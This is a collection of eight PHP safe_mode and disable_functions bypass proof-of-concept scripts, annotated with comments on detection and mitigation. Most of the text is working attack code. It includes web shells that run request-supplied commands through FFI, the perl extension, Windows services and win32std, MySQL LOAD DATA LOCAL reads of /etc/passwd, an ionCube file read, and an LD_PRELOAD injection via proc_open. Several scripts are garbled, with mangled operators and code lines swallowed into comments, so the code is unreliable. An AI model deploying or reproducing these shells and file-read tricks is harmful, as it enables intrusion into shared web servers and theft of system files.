PHP SAFE MODE BYPASS

1- PHP <= 4.4.7 / 5.2.3 MySQL/MySQLi Safe Mode Bypass Vulnerability

<?php
// Historical PoC against PHP's safe_mode (deprecated in 5.3, removed in 5.4).
// The direct read below is the control: it is exactly the kind of access
// safe_mode/open_basedir are meant to refuse for a non-owner script.
file_get_contents('/etc/passwd'); 
// A privileged account is used only to create a scratch table and a
// low-privilege user that is granted SELECT,INSERT on it.
$l = mysql_connect("localhost", "root");
mysql_query("CREATE DATABASE a");
mysql_query("CREATE TABLE a.a (a varchar(1024))"); mysql_query("GRANT SELECT,INSERT ON a.a TO 'aaaa'@'localhost'"); mysql_close($l); 
mysql_connect("localhost", "aaaa");
// LOAD DATA LOCAL INFILE makes the MySQL client library (C code inside the PHP
// process) read the file and ship it to the server, so PHP's stream-layer
// checks never see the path; the rows are then read back with a plain SELECT.
// Defence: local_infile=0 on the server and LOCAL INFILE disabled in the
// client, least-privilege DB accounts (no CREATE/GRANT for web apps), and
// OS-level isolation (separate users, containers) rather than safe_mode.
 mysql_query("LOAD DATA LOCAL INFILE '/etc/passwd' INTO TABLE a.a"); $result = mysql_query("SELECT a FROM a.a"); 
while(list($row) = mysql_fetch_row($result)) 
print $row . chr(10); 

?>

2- MySQL

<?php
// Local-infile callback for mysqli: receives the stream for the infile ($fp),
// a buffer to fill for the server ($buf), the number of bytes wanted ($len)
// and an error-message slot ($err). This one only echoes what it reads and
// never fills $buf, so the table receives nothing — the read itself is the
// point. The stream is opened by the client library, not by PHP's checked
// fopen wrappers.
function r($fp, &$buf, $len, &$err) { 
print fread($fp, $len);
} 
$m = new mysqli('localhost', 'aaaa', '', 'a'); 
// MYSQLI_OPT_LOCAL_INFILE=1 is the switch that enables this path. Keep it off
// unless the application genuinely needs LOAD DATA LOCAL; local_infile=0 on the
// server side refuses it regardless of the client setting.
$m->options(MYSQLI_OPT_LOCAL_INFILE, 1); 
$m->set_local_infile_handler("r"); 
$m->query("LOAD DATA LOCAL INFILE '/etc/passwd' INTO TABLE a.a"); $m->close();
 
?>

3- PHP FFI Extension Safe_mode Bypass Exploit

<?php 
// Web-shell PoC on the old PECL ffi extension (lowercase `ffi` class with a
// string signature) — not the FFI bundled since PHP 7.4, which is gated by
// ffi.enable. Any foreign-function bridge lets a script call arbitrary native
// symbols, so no PHP-level setting (safe_mode, disable_functions, open_basedir)
// can contain it; the only effective control is not loading such an extension
// where untrusted scripts run.
if(!extension_loaded('ffi')) 
die('ERROR: FFI extension is not loaded!'); 
// The command text is taken straight from the request. The script then looks
// for any directory the web server can write to (script dir, session.save_path,
// upload_tmp_dir) to capture output — a writable web root is itself a finding.
$command=(empty($_GET['cmd']))?'dir':$_GET['cmd']; if(is_writeable(dirname(__FILE__)))
$tmp=dirname(__  FILE__); elseif(is_writeable(ini_get('session.save_path'))) $tmp=ini_get('session.save_path'); elseif(is_writeable(ini_get('upload_tmp_dir'))) $tmp=ini_get('upload_tmp_dir'); 
else die('ERROR: Move exploit to writeable folder.'); $output="$tmp\\".uniqid('NJ'); 
// WinExec is invoked directly from kernel32.dll via the bridge, bypassing PHP's
// exec functions entirely. Detection: the PHP worker spawning cmd.exe, and
// short-lived NJ* files in the web root / session / upload temp directories.
// htmlspecialchars() here only protects the HTML output, nothing else.
$api=new ffi("[lib='kernel32.dll'] int WinExec(char *APP,int SW);"); $res=$api->WinExec("cmd.exe /c $command >\"$output\"",0); while(!file_exists($output))sleep(1); 
$con=''; $fp=fopen($output,'r'); while(!feof($fp))$con.=fgets($fp,1024); fclose($fp); $con=htmlspecialchars($con); 
echo "<pre>$con</pre>"; 
unlink($output); 
?>

4- PHP 5.2.4 ionCube extension safe_mode and disable_functions protections bypass

<?php 
if (!extension_loaded("ionCube Loader")) die("ionCube Loader extension required!");
// Traversal prefix: 20 levels of "..\" reach the drive root from anywhere on a
// Windows install, after which the path descends into \windows.
$path = str_repeat("..\\", 20); 
// Control read through PHP's own readfile(): with readfile listed in
// disable_functions this should fail. Note readfile() echoes the content itself
// and returns the byte count (or false), so $MyBoot_readfile holds a number.
$MyBoot_readfile = readfile($path."windows\\system.ini"); 
#just to be sure that I set correctely disable_function 

:)

 
// ioncube_read_file() is the loader's own file-reading primitive, implemented
// inside the extension rather than through PHP's checked stream functions, so
// safe_mode/disable_functions do not apply to it. Lesson: disable_functions is
// a list of PHP function names, not a sandbox — any loaded extension that
// exports its own I/O or exec primitives sits outside it.
$MyBoot_ioncube = ioncube_read_file($path."boot.ini"); 
echo $MyBoot_readfile; 
echo "<br><br>ionCube output:<br><br>"; 
echo $MyBoot_ioncube; 
?>

5 – PHP Perl Extension Safe_mode Bypass

<?php 
// Web-shell PoC over the PECL perl extension. The $HTTP_GET_VARS fallback dates
// this to PHP 4-era request handling.
if(!extension_loaded('perl'))die('perl extension is not loaded'); if(!isset($_GET))$_GET=&$HTTP_GET_VARS; 
if(empty($_GET['cmd']))$_GET['cmd']=(strtoupper(substr(PHP_OS,0,3))=='WIN')?'dir':'ls  '; 
$perl=new perl(); 
echo "<textarea rows='25' cols='75'>"; 
// perl->eval() runs arbitrary Perl in-process, and Perl's system() is a full
// shell, so with this extension loaded PHP's safe_mode/disable_functions are
// irrelevant. Mitigation: never enable language-embedding extensions (perl,
// python, ffi) for tenants running untrusted code. Detection: the web server
// worker spawning sh/cmd.exe. The command output is written into the textarea
// unescaped; only the form value below is HTML-escaped.
$perl->eval("system('".$_GET['cmd']."')"); 
echo "</textarea>"; 
$_GET['cmd']=htmlspecialchars($_GET['cmd']); 
echo "<br><form>CMD: <input type=text name=cmd value='".$_GET['cmd']."' size=25></form>" 
?>

6- PHP 5.x (win32service) Local Safe Mode Bypass Exploit

<?php 
// Web-shell PoC via the win32service extension: the request's command is
// registered as a transient Windows service whose binary is cmd.exe, started
// once, then deleted. The Service Control Manager launches it, not PHP, so
// safe_mode's exec checks are never consulted.
$command=(isset($_GET['CMD']))?$_GET['CMD']:'dir';
#cammand 
$dir=ini_get('upload_tmp_dir'); 
#Directory to store command's output if(!extension_loaded('win32service'))die('win32ser  vice extension not found!'); 
$name=$dir."\\".uniqid('NJ'); 
$n=uniqid('NJ'); 
$cmd=(empty($_SERVER['ComSpec']))?'d:\\windows\\system32\\cmd.exe':$_SERVER['ComSpec']; 
// Installing a service normally requires administrative rights on the SCM, so
// success here also means the web server account is badly over-privileged.
// Detection: System log event 7045 / Security log 4697 (service installed)
// with a cmd.exe image path and a random NJ* service name that is created,
// started, stopped and deleted within seconds.
win32_create_service(array('service'=>$n,'display'=>$n,'path'=>$cmd,'params'=>"/c $command >\"$name\"")); 
win32_start_service($n); 
win32_stop_service($n); 
win32_delete_service($n); 
$exec=file_get_contents($name); 
unlink($name); 
echo "<pre>".htmlspecialchars($exec)."</pre>"; 
?>

7 – PHP 5.2.3 win32std extension safe_mode and disable_functions protections bypass

<?php 
// system() is the control: with safe_mode/disable_functions in force it should
// be refused. win_shell_execute() from win32std (presumably a wrapper around the
// Win32 ShellExecute API — confirm against the extension docs) launches the
// binary from inside the extension, outside PHP's function-level checks. Same
// lesson as the ionCube case: extension-provided exec/I/O primitives are not
// covered by disable_functions; treat that setting as defence in depth only.
if (!extension_loaded("win32std")) die("win32std extension required!"); system("cmd.exe"); 
//just to be sure that protections work well win_shell_execute("..\\..\\..\\..\\windows\\system32\\cmd.exe"); 
?>

8- PHP safe_mode Bypass via proc_open() and custom environment

<?php
// PoC for LD_PRELOAD injection through proc_open()'s $env argument. The
// request parameter c is written to .comm; a.so is not shown on this page —
// presumably it is the preloaded library that reads .comm, acts on it and
// writes .comm1 (confirm against the original advisory).
$path="/var/www"; 
//change to your writable path 
$a=open($path."/.comm","w"); 
fputs($a,$_GET["c"]); 
fclose($a); 
$descriptorspec = array(  0--> array("pipe", "r"),  1 =&gt; array("file", $path."/output.txt","w"),  2 =&gt; array("file", $path."/errors.txt", "a" ) );
$cwd = '.'; 
// The child's environment is passed through verbatim, so the dynamic loader in
// whatever process PHP spawns honours LD_PRELOAD — regardless of whether the
// `id` command itself is allowed (the original comment expects it not to be).
// Mitigations: a dedicated low-privilege PHP user with a non-writable web root
// (the PoC needs a.so written under $path), no proc_open/popen/exec for shared
// tenants, and OS-level isolation; safe_mode-style env filtering was never a
// reliable boundary.
$env = array('LD_PRELOAD' =&gt; $path."/a.so"); 
$process = proc_open('id &gt; /tmp/a', $descriptorspec, $pipes, $cwd, $env); 
// example command - should not succeed sleep(1); $a=fopen($path."/.comm1","r"); 
echo "<strong>"; 
while (!feof($a)) {$b=fgets($a);echo $b;} fclose($a);
?>